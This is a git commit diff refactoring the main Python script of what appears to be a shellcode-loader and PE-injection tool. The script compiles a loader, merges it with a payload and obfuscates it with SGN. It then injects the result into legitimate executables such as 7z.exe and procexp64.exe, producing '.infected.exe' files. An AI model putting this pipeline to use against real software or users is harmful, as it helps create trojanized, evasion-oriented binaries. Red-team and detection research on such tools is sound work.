refactor: cleanup 1

This commit is contained in:
Dobin
2024-03-01 13:13:40 +00:00
parent d0500107c0
commit 78027916e2
7 changed files with 95 additions and 128 deletions
+21 -103
View File
@@ -14,7 +14,7 @@ import phases.compiler
import phases.assembler
import phases.injector
from observer import observer
from peparser.pehelper import extract_code_from_exe_file
from peparser.pehelper import extract_code_from_exe_file_ep
from model.project import Project
from model.settings import Settings
@@ -55,22 +55,18 @@ def main():
settings.verify = True
settings.try_start_final_infected_exe = False
settings.try_start_final_shellcode = False
if args.verify == "peb":
settings.source_style = SourceStyle.peb_walk
settings.inject = True
settings.inject_mode = 2
settings.inject_exe_in = "exes/7z.exe"
settings.inject_exe_out = "out/7z-verify.exe"
elif args.verify == "iat":
settings.source_style = SourceStyle.iat_reuse
settings.inject = True
settings.inject_mode = 2
settings.inject_exe_in = "exes/procexp64.exe"
settings.inject_exe_out = "out/procexp64-verify.exe"
elif args.verify == "rwx":
settings.inject = True
settings.source_style = SourceStyle.peb_walk
settings.inject_mode = 1 # ,2 is broken atm
settings.inject_exe_in = "exes/wifiinfoview.exe"
@@ -81,9 +77,6 @@ def main():
else:
settings.try_start_final_infected_exe = args.start_injected
settings.try_start_final_shellcode = args.start_final_shellcode
settings.try_start_loader_shellcode = args.start_loader_shellcode
settings.cleanup_files_on_start = not args.no_clean_at_start
settings.cleanup_files_on_exit =not args.no_clean_at_exit
@@ -131,36 +124,24 @@ def main():
if not os.path.isfile(args.inject):
logger.info("Could not find: {}".format(args.inject))
return
settings.inject = True
settings.inject_exe_in = args.inject
settings.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
start(settings)
def get_physical_address(pe, virtual_address):
# Iterate through the section headers to find which section contains the VA
for section in pe.sections:
# Check if the VA is within the range of this section
if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize:
# Calculate the difference between the VA and the section's virtual address
virtual_offset = virtual_address - section.VirtualAddress
# Add the difference to the section's pointer to raw data
return virtual_offset
#physical_address = section.PointerToRawData + virtual_offset
#return physical_address
return None
def start(settings: Settings):
# Delete: all old files
if settings.cleanup_files_on_start:
clean_files()
delete_all_files_in_directory("logs/")
exit_code = 0 # 0 = success
# Load our input
project = Project(settings)
project.init()
# Copy: IAT_REUSE loader C files into working directory: build/
# Create: Carrier C source files from template (C->C)
phases.templater.create_c_from_template(
source_style = settings.source_style,
alloc_style = settings.alloc_style,
@@ -168,36 +149,26 @@ def start(settings: Settings):
decoder_style= settings.decoder_style,
payload_len = project.payload.len,
)
# Compile: IAT_REUSE loader C -> ASM
# Compile: Carrier to .asm (C -> ASM)
if settings.generate_asm_from_c:
phases.compiler.compile(
c_in = main_c_file,
asm_out = main_asm_file,
payload_len = project.payload.len,
carrier = project.carrier,
source_style = project.settings.source_style,
exe_host = project.exe_host,
short_call_patching = project.settings.short_call_patching)
if settings.source_style == SourceStyle.iat_reuse:
logger.warning("--[ SourceStyle: Using IAT_REUSE".format())
phases.compiler.fixup_iat_reuse(main_asm_file, project.carrier)
observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
if not exehost_has_all_carrier_functions(project.carrier, project.exe_host):
logger.error("Error: Not all carrier functions are available in the target exe")
return
# Assemble: ASM -> Shellcode
# Assemble: Assemble .asm to .shc (ASM -> SHC)
if settings.generate_shc_from_asm:
phases.assembler.asm_to_shellcode(
asm_in = main_asm_file,
build_exe = main_exe_file,
shellcode_out = main_shc_file)
# Try: Starting the loader-shellcode (rarely useful)
if settings.try_start_loader_shellcode:
try_start_shellcode(main_shc_file)
# Merge: shellcode/loader with payload
# Merge: shellcode/loader with payload (SHC + PAYLOAD -> SHC)
if settings.dataref_style == DataRefStyle.APPEND:
phases.assembler.merge_loader_payload(
shellcode_in = main_shc_file,
@@ -205,20 +176,7 @@ def start(settings: Settings):
payload_data = project.payload.payload_data,
decoder_style = settings.decoder_style)
if settings.verify and settings.source_style == SourceStyle.peb_walk:
logger.info("--[ Verify final shellcode")
if not verify_shellcode(main_shc_file):
logger.info("Could not verify, still continuing")
#return
if settings.try_start_final_shellcode:
logger.info("--[ Test Append shellcode")
try_start_shellcode(main_shc_file)
# copy it to out
shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
# RWX Injection
# RWX Injection (optional): obfuscate loader+payload
if project.exe_host.rwx_section != None:
logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
project.exe_host.rwx_section.Name.decode().rstrip('\x00')
@@ -228,47 +186,18 @@ def start(settings: Settings):
shutil.move(main_shc_file + ".sgn", main_shc_file)
# inject merged loader into an exe
exit_code = 0
if settings.inject:
main_shc = file_readall_binary(main_shc_file)
l = len(main_shc)
if l + 128 > project.exe_host.code_size:
logger.error("Error: Shellcode {}+128 too small for target code section {}".format(
l, project.exe_host.code_size
))
return
phases.injector.inject_exe(main_shc_file, settings, project)
observer.add_code("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300))
phases.injector.inject_exe(main_shc, settings, project)
#if settings.source_style == SourceStyle.iat_reuse:
# phases.injector.injected_fix_iat(
# settings.inject_exe_out, project.carrier, project.exe_host)
# TODO IF?
#phases.injector.injected_fix_data(
# settings.inject_exe_out,
# project.carrier,
# project.exe_host)
# Just print, to verify
code = extract_code_from_exe_file(settings.inject_exe_out)
pe = pefile.PE(settings.inject_exe_out)
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep_raw = get_physical_address(pe, ep)
pe.close()
#print("Raw: {} / 0x{:x}".format(
# ep_raw, ep_raw))
observer.add_code("exe_final",
code[ep_raw:ep_raw+300])
if settings.verify:
logger.info("--[ Verify infected exe")
exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out)
elif settings.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out))
run_process_checkret([
settings.inject_exe_out,
], check=False)
# Start/verify it at the end
if settings.verify:
logger.info("--[ Verify infected exe")
exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out)
elif settings.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out))
run_process_checkret([
settings.inject_exe_out,
], check=False)
# Cleanup files
if settings.cleanup_files_on_exit:
@@ -278,16 +207,6 @@ def start(settings: Settings):
exit(exit_code)
def exehost_has_all_carrier_functions(carrier: Carrier, exe_host: ExeHost):
is_ok = True
for iat_entry in carrier.iat_requests:
addr = exe_host.get_vaddr_of_iatentry(iat_entry.name)
if addr == 0:
logging.info("---( Function not available as import: {}".format(iat_entry.name))
is_ok = False
return is_ok
def obfuscate_shc_loader(file_shc_in, file_shc_out):
logger.info("--[ Obfuscate shellcode with SGN")
run_process_checkret([
@@ -329,7 +248,6 @@ def verify_shellcode(shc_name):
return False
if __name__ == "__main__":
setup_logging()
main()